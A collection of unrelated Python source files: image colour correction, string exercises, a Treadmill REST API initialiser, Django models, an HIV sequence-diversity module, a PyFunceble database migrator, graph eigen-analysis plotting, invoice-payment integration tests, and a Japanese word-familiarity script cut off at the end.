def color_constancy(img, power=6, gamma=None):
"""
Parameters
----------
img: 2D numpy array
The original image with format of (h, w, c)
power: int
The degree of norm, 6 is used in reference paper
gamma: float
The value of gamma correction, 2.2 is used in reference paper
"""
## img = cv2.imread(img_name)
# img = np.array(Image.open(img_name))
img = cv2.cvtColor(np.array(img), cv2.COLOR_RGB2BGR)
img_dtype = img.dtype
if gamma is not None:
img = img.astype('uint8')
look_up_table = np.ones((256,1), dtype='uint8') * 0
for i in range(256):
look_up_table[i][0] = 255*pow(i/255, 1/gamma)
img = cv2.LUT(img, look_up_table)
img = img.astype('float32')
img_power = np.power(img, power)
rgb_vec = np.power(np.mean(img_power, (0,1)), 1/power)
rgb_norm = np.sqrt(np.sum(np.power(rgb_vec, 2.0)))
rgb_vec = rgb_vec/rgb_norm
rgb_vec = 1/(rgb_vec*np.sqrt(3))
img = np.multiply(img, rgb_vec)
img = cv2.cvtColor(np.array(img), cv2.COLOR_BGR2RGB)
# img_name_mod = img_name.split('.')[0] + '_ilu.' + img_name.split('.')[1]
# img_save = Image.fromarray(img.astype('uint8'))
# img_save.save(img_name_mod)
## cv2.imwrite(img_name_mod, np.array(img_save))
# return img
return img.astype(img_dtype)
|
# Determine if a string has all unique characters.
def is_unique(s):
for x in range(0, len(s)):
for y in range(x+1,len(s)):
if s[x]==s[y]:
return False
return True
# Should have used new array with simple 128 hash function and check for less than 128 size string
# That would have O(n) runtime (or O(1) because largest loop is 128 long)
def is_unique2(s):
if len(s)>128:
return False
charset=[False]*128
for letter in s:
key=ord(letter)
if charset[key]:
return False
charset[key]=True
return True
# Check if one string is a permutation of the other
def is_permutation(string_one, string_two):
if (len(string_one)!=len(string_two)):
return False
char_set = [0]*128
for letter in string_one:
char_set[ord(letter)]+=1
for letter in string_two:
char_set[ord(letter)]-=1
if char_set[ord(letter)] < 0:
return False
return True
import unittest
class TestStringsQuestions(unittest.TestCase):
def test_is_permutation(self):
self.assertTrue(is_permutation("i","i"))
self.assertFalse(is_permutation("hi","i"))
def test_is_unique(self):
self.assertTrue(is_unique('asdfghjk'))
self.assertFalse(is_unique('ff'))
def test_is_unique2(self):
self.assertTrue(is_unique2('asdfghjk'))
self.assertFalse(is_unique2('ff'))
if __name__ == '__main__':
unittest.main()
|
"""Treadmill REST APIs"""
import logging
import importlib
import pkgutil
import flask
# E0611: Used when a name cannot be found in a module.
# F0401: Used when PyLint has been unable to import a module.
#
# pylint: disable=E0611,F0401
import flask_restplus as restplus
from treadmill import authz
from treadmill.rest import error_handlers
from treadmill import rest
from treadmill import utils # noqa: F401
from treadmill import webutils
__path__ = pkgutil.extend_path(__path__, __name__)
_LOGGER = logging.getLogger(__name__)
def init(apis, title=None, cors_origin=None, authz_arg=None):
"""Module initialization."""
blueprint = flask.Blueprint('v1', __name__)
api = restplus.Api(blueprint, version='1.0',
title=title,
description="Treadmill REST API Documentation")
error_handlers.register(api)
# load up any external error_handlers
try:
err_handlers_plugin = importlib.import_module(
'treadmill.plugins.rest.error_handlers')
err_handlers_plugin.init(api)
except ImportError as err:
_LOGGER.warn('Unable to load error_handlers plugin: %s', err)
@blueprint.route('/docs/', endpoint='docs')
def _swagger_ui():
"""Swagger documentation route"""
return restplus.apidoc.ui_for(api)
rest.FLASK_APP.register_blueprint(blueprint)
rest.FLASK_APP.register_blueprint(restplus.apidoc.apidoc)
cors = webutils.cors(origin=cors_origin,
content_type='application/json',
credentials=True)
@rest.FLASK_APP.after_request
def _after_request_cors_handler(response):
"""Process all OPTIONS request, thus don't need to add to each app"""
if flask.request.method != 'OPTIONS':
return response
_LOGGER.debug('This is an OPTIONS call')
def _noop_options():
"""No noop response handler for all OPTIONS"""
pass
headers = flask.request.headers.get('Access-Control-Request-Headers')
options_cors = webutils.cors(origin=cors_origin,
credentials=True,
headers=headers)
response = options_cors(_noop_options)()
return response
def user_clbk():
"""Get current user from the request."""
return flask.request.environ.get('REMOTE_USER')
if authz_arg is None:
authorizer = authz.NullAuthorizer()
else:
authorizer = authz.ClientAuthorizer(user_clbk, authz_arg)
endpoints = []
for apiname in apis:
try:
apimod = apiname.replace('-', '_')
_LOGGER.info('Loading api: %s', apimod)
api_restmod = importlib.import_module(
'.'.join(['treadmill', 'rest', 'api', apimod])
)
api_implmod = importlib.import_module(
'.'.join(['treadmill', 'api', apimod])
)
api_impl = api_implmod.init(authorizer)
endpoint = api_restmod.init(api, cors, api_impl)
if endpoint is None:
endpoint = apiname.replace('_', '-').replace('.', '/')
if not endpoint.startswith('/'):
endpoint = '/' + endpoint
endpoints.append(endpoint)
except ImportError as err:
_LOGGER.warn('Unable to load %s api: %s', apimod, err)
return endpoints
|
class Person:
'''Clase de Persona
recibe el nombre y apellido como parametro'''
def __init__(self, fname, lname):
self.firstname = fname
self.lastname = lname
def printname(self):
print(self.firstname, self.lastname)
class Student(Person):
def __init__(self, fname, lname, clave):
super().__init__(fname , lname)
self.__carrera = 'medicina'
self.__clave = clave
def getClave(self):
return self.__clave
def setClave(esta, clave):
esta.__clave = clave
def getCarrera(self):
return self.__carrera
def setCarrera(esta, carrera):
esta.__carrera = 'enfermeria'
def printname(self):
super().printname()
print("Soy estudiante")
Cristian = Person('Cristian', 'Flores')
Cristian.printname()
print()
Pedro = Student('Pedro', 'Jimenez', 200977)
Pedro.printname()
print('Mi clave es:', Pedro.getClave())
print('Mi carrera es:', Pedro.getCarrera())
print()
Raquel = Student('Raquel', 'Garcia', 200896)
Raquel.printname()
Raquel.setClave(200896)
print('Mi clave es:', Raquel.getClave())
Raquel.setCarrera('Enfermera')
print('Mi carrera es:', Raquel.getCarrera())
|
from django.db import models
from django.contrib .auth.models import User
from tinymce.models import HTMLField
# Create your models here.
class Profile(models.Model):
profile_image = models.ImageField(upload_to = 'pictures/')
bio= models.CharField(max_length=30)
user= models.OneToOneField(User,on_delete=models.CASCADE)
username= models.CharField(max_length=32)
location = models.CharField(max_length=32)
neighbourhood = models.CharField(max_length=32,null= True)
def save_profile(self):
self.save()
def delete_neighbourhood(self):
self.delete()
class post(models.Model):
name= models.CharField(max_length=30)
user= models.ForeignKey(User)
post = HTMLField()
image_path = models.ImageField(upload_to = 'pictures/')
def __str__(self):
return self.name
def save_post(self):
self.save()
class NeighbourHood(models.Model):
image_path = models.ImageField(upload_to = 'pictures/')
name = models.CharField(max_length=30)
location= models.CharField(max_length=32)
count = models.IntegerField(default=0)
def __str__(self):
return self.name
def save_neighbourhood(self):
self.save()
def delete_neighbourhood(self):
self.delete()
class Business(models.Model):
owner = models.CharField(max_length=30)
business_name= models.CharField(max_length=32)
business_email =models.EmailField(max_length=300)
description= models.TextField(max_length=300)
location = models.ForeignKey(NeighbourHood,on_delete=models.CASCADE)
user = models.ForeignKey(User,on_delete=models.CASCADE)
def create_business(self):
self.save()
def delete_business(self):
self.delete()
def __str__(self):
return self.location
|
import pytest
from .solution import solve, solve2
INPUT = """
"""
def test_solve():
assert solve(4, 8) == 739785
def test_solve2():
assert solve2(4, 8) == 444356092776315
|
# vim: fdm=marker
'''
author: Fabio Zanini/Richard Neher
date: 25/04/2015
content: Data access module HIV patients.
'''
# Modules
import numpy as np
from .sequence import alpha, alphaa
def diversity(af):
return np.mean(af.sum(axis=0)) - np.mean(np.sum(af**2, axis=0))
def divergence(af, initial):
return np.mean(af.sum(axis=0)) - np.mean(af[initial,np.arange(len(initial))])
def majority_frequency(af):
return np.max(af, axis=0)
def majority_indices(af):
return np.argmax(af, axis=0)
def consensus(af):
return alpha[majority_indices(af)]
def LD(af2p, af1p, cov, cov_min = 100):
p = af1p.max(axis=0)
pi = af1p.argmax(axis=0)
q=1-p
p12 = np.ma.zeros(cov.shape, dtype = float)
ind1 = np.arange(pi.shape[0])
ind2 = np.ones(pi.shape[0], dtype=int)
#import pdb; pdb.set_trace()
for ii, nuci in enumerate(pi):
p12[ii,:] = af2p[nuci][(pi,ii*ind2,ind1)]
p12.mask = cov<cov_min
np.fill_diagonal(p12.mask, True)
p1p2 = np.outer(p,p)
p1q1p2q2 = np.outer(p*q,p*q)
p1q2 = np.outer(p,q)
D = p12 - p1p2
LD = D**2/(1e-10+p1q1p2q2)
Dp = D
Dp[Dp>0] /= np.minimum(p1q2, p1q2.T)[Dp>0]
Dp[Dp<0] /= np.minimum(p1p2, p1p2.T)[Dp<0]
Dp = np.abs(Dp)
np.fill_diagonal(LD,0)
np.fill_diagonal(Dp,0)
return LD, Dp, p12
|
"""
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Provides the migrator manager.
Author:
Nissar Chababy, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/#/special-thanks
Contributors:
https://pyfunceble.github.io/#/contributors
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 Nissar Chababy
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from typing import Optional
import colorama
from sqlalchemy.orm import Session
import PyFunceble.checker.utils.whois
import PyFunceble.cli.utils.stdout
import PyFunceble.cli.utils.testing
import PyFunceble.facility
import PyFunceble.factory
import PyFunceble.storage
from PyFunceble.cli.continuous_integration.base import ContinuousIntegrationBase
from PyFunceble.cli.migrators.alembic import Alembic
from PyFunceble.cli.migrators.csv_file.inactive_source_delete import (
InactiveDatasetDeleteSourceColumnMigrator,
)
from PyFunceble.cli.migrators.csv_file.whois_registrar_add import (
WhoisDatasetAddRegistrarColumnMigrator,
)
from PyFunceble.cli.migrators.file_cleanup.hashes_file import HashesFileCleanupMigrator
from PyFunceble.cli.migrators.file_cleanup.mining_file import MiningFileCleanupMigrator
from PyFunceble.cli.migrators.file_cleanup.production_config_file import (
ProductionConfigFileCleanupMigrator,
)
from PyFunceble.cli.migrators.json2csv.inactive import InactiveJSON2CSVMigrator
from PyFunceble.cli.migrators.json2csv.whois import WhoisJSON2CSVMigrator
from PyFunceble.cli.migrators.mariadb.file_and_status import FileAndStatusMigrator
from PyFunceble.cli.migrators.mariadb.whois_record_idna_subject import (
WhoisRecordIDNASubjectMigrator,
)
from PyFunceble.cli.processes.base import ProcessesManagerBase
from PyFunceble.cli.processes.workers.migrator import MigratorWorker
from PyFunceble.helpers.file import FileHelper
class MigratorProcessesManager(ProcessesManagerBase):
"""
Provides the migrator manager.
"""
WORKER_OBJ: MigratorWorker = MigratorWorker
@staticmethod
def json2csv_inactive_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the inactive database migrator.
"""
migrator = InactiveJSON2CSVMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started migration (json2csv) of the inactive dataset."
)
migrator.start()
if migrator.done:
print(
f"\n{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished migration (json2csv) of the inactive dataset."
)
else:
print(
f"\n{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished migration (json2csv) of the inactive dataset."
)
else:
PyFunceble.facility.Logger.info(
"Stopped json2csv_inactive_target. File does not exist."
)
@staticmethod
def json2csv_whois_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the whois database migrator.
"""
migrator = WhoisJSON2CSVMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started migration (json2csv) of the whois dataset."
)
migrator.start()
if migrator.done:
print(
f"\n{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished migration (json2csv) of the whois dataset."
)
else:
print(
f"\n{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished migration (json2csv) of the whois dataset."
)
else:
PyFunceble.facility.Logger.info(
"Stopped json2csv_whois_target. File does not exist."
)
@staticmethod
def mariadb_whois_record_idna_subject_target(
continuous_integration: ContinuousIntegrationBase,
*,
db_session: Optional[Session] = None,
) -> None:
"""
Provides the target for the whois addition of the missing
idna_subject column.
"""
migrator = WhoisRecordIDNASubjectMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
migrator.db_session = db_session
if migrator.authorized:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started completion of NULL idna_subject(s) into the whois dataset."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished completion of NULL idna_subject(s) into "
"the whois dataset."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished completion of NULL idna_subject(s) into "
"the whois dataset."
)
else:
PyFunceble.facility.Logger.info(
"Stopped mariadb_whois_record_idna_subject_target. Not authorized."
)
@staticmethod
def mariadb_file_and_status_target(
continuous_integration: ContinuousIntegrationBase,
*,
db_session: Optional[Session] = None,
) -> None:
"""
Provides the target for the migration of the :code:`pyfunceble_file`
and :code:`pyfunceble_status` tables.
"""
migrator = FileAndStatusMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
migrator.db_session = db_session
if migrator.authorized:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started migration of the pyfunceble_file and "
"pyfunceble_status tables."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished migration of the pyfunceble_file and "
"pyfunceble_status tables."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Unfinished migration of the pyfunceble_file and "
"pyfunceble_status tables."
)
else:
PyFunceble.facility.Logger.info(
"Stopped mariadb_file_and_status_target. Not authorized."
)
@staticmethod
def hashes_file_cleanup_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the cleanup of the hashes file.
"""
migrator = HashesFileCleanupMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Started deletion of {migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
f"Finished deletion of {migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Unfinished deletion of {migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped hashes_file_cleanup_target. File does not exist."
)
@staticmethod
def production_config_file_cleanup_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the cleanup of the production configuration file.
"""
migrator = ProductionConfigFileCleanupMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Started deletion of {migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
f"Finished deletion of {migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Unfinished deletion of {migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped production_config_file_cleanup_target. File does not exist."
)
@staticmethod
def mining_file_cleanup_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the cleanup of the mining file.
"""
migrator = MiningFileCleanupMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
if FileHelper(migrator.source_file).exists():
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Started deletion of {migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
f"Finished deletion of {migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
f"Unfinished deletion of {migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped hashes_file_cleanup_target. File does not exist."
)
@staticmethod
def csv_file_delete_source_column_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the deletion of the source column.
"""
migrator = InactiveDatasetDeleteSourceColumnMigrator(
print_action_to_stdout=True
)
migrator.continuous_integration = continuous_integration
file_helper = FileHelper(migrator.source_file)
if file_helper.exists():
with file_helper.open("r", encoding="utf-8") as file_stream:
first_line = next(file_stream)
if any(x in first_line for x in migrator.TO_DELETE):
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started deletion of the 'source' column into "
f"{migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished deletion of the 'source' column into "
f"{migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"unfinished deletion of the 'source' column into "
f"{migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped csv_file_delete_source_column_target. File does not exist."
)
@staticmethod
def csv_file_add_registrar_column_target(
continuous_integration: ContinuousIntegrationBase,
) -> None:
"""
Provides the target for the addition of the registrar column.
"""
migrator = WhoisDatasetAddRegistrarColumnMigrator(print_action_to_stdout=True)
migrator.continuous_integration = continuous_integration
file_helper = FileHelper(migrator.source_file)
if file_helper.exists():
with file_helper.open("r", encoding="utf-8") as file_stream:
first_line = next(file_stream)
if any(x not in first_line for x in migrator.TO_ADD):
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"Started addition of the 'registrar' column into "
f"{migrator.source_file!r}."
)
migrator.start()
if migrator.done:
print(
f"{colorama.Fore.GREEN}{colorama.Style.BRIGHT}"
"Finished addition of the 'registrar' column into "
f"{migrator.source_file!r}."
)
else:
print(
f"{colorama.Fore.MAGENTA}{colorama.Style.BRIGHT}"
"unfinished addition of the 'registrar' column into "
f"{migrator.source_file!r}."
)
else:
PyFunceble.facility.Logger.info(
"Stopped csv_file_add_registrar_column_target. File does not exist."
)
def create(self) -> "ProcessesManagerBase":
for method in dir(self):
if not method.endswith("_target"):
continue
worker = MigratorWorker(
None,
name=f"pyfunceble_{method}",
daemon=True,
continuous_integration=self.continuous_integration,
)
worker.target = getattr(self, method)
self._created_workers.append(worker)
PyFunceble.facility.Logger.info("Created worker for %r", method)
@ProcessesManagerBase.ensure_worker_obj_is_given
@ProcessesManagerBase.create_workers_if_missing
def start(self) -> "ProcessesManagerBase":
# We start the migration (as a standalone)
Alembic(self._created_workers[0].db_session).upgrade()
return super().start()
|
import os
import glob
import numpy as np
import pandas as pd
import scipy as sp
import itertools
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
import seaborn as sns
from sklearn.preprocessing import normalize
from sklearn.cluster import KMeans
def normalize_gram_matrix(gram_matrix):
"""
Normalization of Gram matrix.
Parameters
----------
gram_matrix: 2D array, (n_graphs, n_graphs)
Gram matrix.
Returns
-------
norm_gram_matrix: 2D array, (n_graphs, n_graphs)
Normalized gram matrix.
"""
gram_matrix_normalized = np.zeros(gram_matrix.shape)
for i in np.arange(gram_matrix.shape[0]):
for j in np.arange(i, gram_matrix.shape[0]):
gram_matrix_normalized[i, j] = gram_matrix[i, j] / np.sqrt(gram_matrix[i, i] * gram_matrix[j, j])
norm_gram_matrix = np.triu(gram_matrix_normalized, 1) + gram_matrix_normalized.T
return norm_gram_matrix
def sort_eigvec(A):
"""
Sort of eigenvalues and eigenvectors.
Parameters
----------
A: 2D array, (n_graphs, n_graphs)
Matrix to be sorted.
Return
------
sort_d: array
Sorted eigenvalues.
sort_v: 2D array
Sorted eigenvectors.
"""
d, v = sp.linalg.eig(A)
ind = d.argsort()[::-1]
sort_d = d[ind]
sort_v = v[:, ind]
return sort_d, sort_v
def save_metrics(d, v, outdir=None):
"""
Save plots of dominant eigenvalues and of first and second eigenvectors.
Parameters
----------
d: array
Array of eigenvalues.
v: 2D array
Array of eigenvectors.
"""
if outdir is None:
outdir = os.getcwd()
else:
if not os.path.exists(outdir):
os.mkdir(outdir)
np.savetxt(os.path.join(outdir, 'eigvalues.csv'), d, delimiter=',')
np.savetxt(os.path.join(outdir, 'eigfunctions.csv'), v, delimiter=',')
sns.set()
plt.rcParams['figure.figsize'] = [20, 10]
fig = plt.figure()
ax1 = fig.add_subplot(2, 1, 1)
sns.scatterplot(np.real(d[0:10]), np.imag(d[0:10]), color='red', ax=ax1)
plt.xlabel('Real part')
plt.ylabel('Imaginary part')
plt.title('Spectrum')
ax2 = fig.add_subplot(2, 1, 2)
labels = ['First eigenfunction', 'Second eigenfunction']
for i in range(2):
v[:, i] = v[:, i] / np.max(abs(v[:, i]))
sns.lineplot(range(v.shape[0]), v[:, i], label=labels[i], lw=1, ax=ax2)
plt.legend(loc='upper left')
plt.title('The first and the second eigenfunctions')
if outdir is not None:
fig.savefig(os.path.join(outdir, 'metrics.png'))
else:
plt.show()
def show_graph(x, ind, outdir=None, data_points=None, node_colors=None):
"""
Plot average graph.
Parameters
----------
x: 2D array, (n_graphs, n_graphs)
Average adjacency matrix.
ind: int
Index of graph state.
outdir: str
Dir to save plots.
"""
sns.set(rc={'figure.figsize': (20, 8.27)})
if data_points is not None and not isinstance(data_points, dict):
keys = np.arange(len(data_points))
values = list(map(tuple, data_points))
data_points = dict(zip(keys, values))
g = nx.Graph()
graph = nx.from_numpy_array(normalize(x))
if data_points is not None:
g.add_nodes_from(data_points.keys())
pos = data_points
else:
pos = nx.spring_layout(g)
for n, p in pos.items():
g.nodes[n]['p'] = p
fig1, ax1 = plt.subplots()
if node_colors is None:
node_colors = np.sum(x, axis=1)
mcl1 = nx.draw_networkx_nodes(graph, pos=pos, with_labels=False, node_color=node_colors, cmap=plt.cm.PuOr,
node_size=80, ax=ax1)
nx.draw_networkx_edges(graph, pos=pos, edge_color='black', alpha=0.2, ax=ax1)
divider1 = make_axes_locatable(ax1)
cax1 = divider1.append_axes("right", size="5%", pad=0.05)
plt.colorbar(mcl1, cax=cax1)
plt.grid()
ax1.tick_params(left=True, bottom=True, labelleft=True, labelbottom=True)
if outdir is not None:
if not os.path.exists(outdir):
os.mkdir(outdir)
plt.savefig(outdir + 'nodes_' + ind)
else:
plt.show()
def plot_avg_graph(graphs, eigenfunc, graph_states, outdir=None, data_points=None):
"""
Plot average graphs for each state.
Parameters
----------
graphs: array, (n_graphs, n_nodes, n_nodes)
Snapshots of the time-dependent graph.
eigenfunc: array
Eigenfunction of transfer ooperators.
graph_states: array
Number of states for k-means clustering, based on number of dominant eigenvalues.
outdir: srr
Dir to save plots.
data_points: 2D array, (n_nodes, 2)
"""
k_means = KMeans(n_clusters=graph_states).fit(np.real(eigenfunc[:, :graph_states]))
for idx in range(graph_states):
ind = np.argwhere(k_means.labels_ == idx)
graph_idx = graphs[ind, :].squeeze()
avg_graphs = np.mean(graph_idx, axis=0)
show_graph(avg_graphs, str(idx), outdir, data_points)
def combine_plots(path_to_img):
files = glob.glob(path_to_img + '/*.png')
output = plt.imread(files[0])[:, :, :3]
for i in range(1, len(files)):
img = plt.imread(files[i])[:, :, :3]
output = concat_images(output, img)
plt.imsave(path_to_img + '/output.png', output)
def concat_images(imga, imgb):
new_img = np.concatenate((imga, imgb), axis=1)
return new_img
def create_graphs_from_matrix(df):
"""
Create graphs from matrix.
Parameters
----------
df: pandas DataFrame, (n_time_points, n_features)
DataFrame of features and time points.
Returns
-------
data_dict: dictionary
Dictionary with keys: time_points/names of samples;
values: 2D array, (n_nodes, n_nodes).
"""
n_nodes, n_graphs = df.shape[-1], df.shape[0]
data_dict = {}
for i in range(n_graphs):
adj_matrix = np.zeros((n_nodes, n_nodes))
if isinstance(df, pd.DataFrame):
name = df.iloc[i, :].name
current_array = df.iloc[i, :]
else:
name = i
current_array = df[i, :]
non_zero = np.nonzero(current_array)[0]
pairs = list(itertools.combinations(non_zero, 2))
for pair in pairs:
n1 = pair[0]
n2 = pair[1]
adj_matrix[n1][n2] = current_array[n1] * current_array[n2]
adj_matrix[n2][n1] = current_array[n1] * current_array[n2]
data_dict[name] = adj_matrix
return data_dict
|
from moco_wrapper.util.response import JsonResponse, ListingResponse, EmptyResponse
from moco_wrapper.util.generator import InvoiceItemGenerator, InvoicePaymentGenerator
from .. import IntegrationTest
from datetime import date
class TestInvoicePayment(IntegrationTest):
def get_customer(self):
with self.recorder.use_cassette("TestInvoicePayment.get_customer"):
customer_create = self.moco.Company.create(
"TestInvoicePayment",
company_type="customer"
)
return customer_create.data
def get_invoice(self):
customer = self.get_customer()
with self.recorder.use_cassette("TestInvoicePayment.get_invoice"):
gen = InvoiceItemGenerator()
items = [
gen.generate_title("dummy invoice item title"),
gen.generate_description("dummy invoice item description"),
gen.generate_lump_position("server hardware", 2000)
]
invoice_create = self.moco.Invoice.create(
customer.id,
"dummy invoice",
date(2020, 1, 1),
date(2021, 1, 1),
date(2020, 1, 1),
date(2020, 3, 1),
"dummy invoice",
19,
"EUR",
items,
)
return invoice_create.data
def test_getlist(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_getlist"):
payment_list = self.moco.InvoicePayment.getlist(invoice_id=invoice.id)
assert payment_list.response.status_code == 200
assert isinstance(payment_list, ListingResponse)
def test_create(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_create"):
payment_date = date(2020, 1, 2)
amount = 200
currency = "EUR"
payment_create = self.moco.InvoicePayment.create(
payment_date,
invoice.id,
amount,
"EUR"
)
assert payment_create.response.status_code == 200
assert isinstance(payment_create, JsonResponse)
assert payment_create.data.date == payment_date.isoformat()
assert payment_create.data.paid_total == amount
assert payment_create.data.currency == currency
assert payment_create.data.invoice.id == invoice.id
def test_create_bulk(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_create_bulk"):
gen = InvoicePaymentGenerator()
items = [
gen.generate(date(2020, 1, 1), invoice.id, 200, "EUR"),
gen.generate(date(2020, 1, 2), invoice.id, 150, "EUR")
]
payment_create = self.moco.InvoicePayment.create_bulk(items)
assert payment_create.response.status_code == 200
assert isinstance(payment_create, ListingResponse )
def test_get(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_get"):
payment_date = date(2020, 1, 2)
amount = 200
currency = "EUR"
payment_create = self.moco.InvoicePayment.create(
payment_date,
invoice.id,
amount,
"EUR"
)
payment_get = self.moco.InvoicePayment.get(payment_create.data.id)
assert payment_create.response.status_code == 200
assert payment_get.response.status_code == 200
assert isinstance(payment_create, JsonResponse)
assert isinstance(payment_get, JsonResponse)
assert payment_get.data.date == payment_date.isoformat()
assert payment_get.data.paid_total == amount
assert payment_get.data.currency == currency
assert payment_get.data.invoice.id == invoice.id
def test_update(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_update"):
payment_date = date(2020, 1, 2)
amount = 200
currency = "EUR"
payment_create = self.moco.InvoicePayment.create(
date(2019, 12, 31),
invoice.id,
1,
"EUR"
)
payment_update = self.moco.InvoicePayment.update(
payment_create.data.id,
payment_date=payment_date,
paid_total=amount,
currency="EUR"
)
assert payment_create.response.status_code == 200
assert payment_update.response.status_code == 200
assert isinstance(payment_create, JsonResponse)
assert isinstance(payment_update, JsonResponse)
assert payment_update.data.date == payment_date.isoformat()
assert payment_update.data.paid_total == amount
assert payment_update.data.currency == currency
assert payment_update.data.invoice.id == invoice.id
def test_delete(self):
invoice = self.get_invoice()
with self.recorder.use_cassette("TestInvoicePayment.test_delete"):
payment_create = self.moco.InvoicePayment.create(
date(2020, 1, 1),
invoice.id,
100,
"EUR"
)
payment_delete = self.moco.InvoicePayment.delete(payment_create.data.id)
assert payment_create.response.status_code == 200
assert payment_delete.response.status_code == 204
assert isinstance(payment_create, JsonResponse)
assert isinstance(payment_delete, EmptyResponse)
|
import numpy as np
import re
import spacy
from functools import lru_cache
import en_core_web_lg
nlp = en_core_web_lg.load()
#親やすさdicを作成する
###############
#textをnew_listに読み込む
with open("tango_sitasimiyasusa_list.txt", "r", encoding="utf-8") as f:
list = f.readlines()
new_list = []
for i in list:
word = i.split()
new_list.append(word)
#####################################
#使いたいパラメータの数字を取り出す→相関の確認
#単語名,親やすさ(100:親しみがない,700:親しみがある)
sitasimi_tango={}
count_level = 1
while count_level < 1945:
#値を取り出す
tango_list = new_list[count_level][0] #単語名
suuti_list = new_list[count_level][5] #数値
#文字列を数値に変換
y = round(float(suuti_list)*100)
sitasimi_tango[tango_list] = y
count_level+=1
with open('book/book1.txt', 'r') as f:
#改行("\n")を""に変換
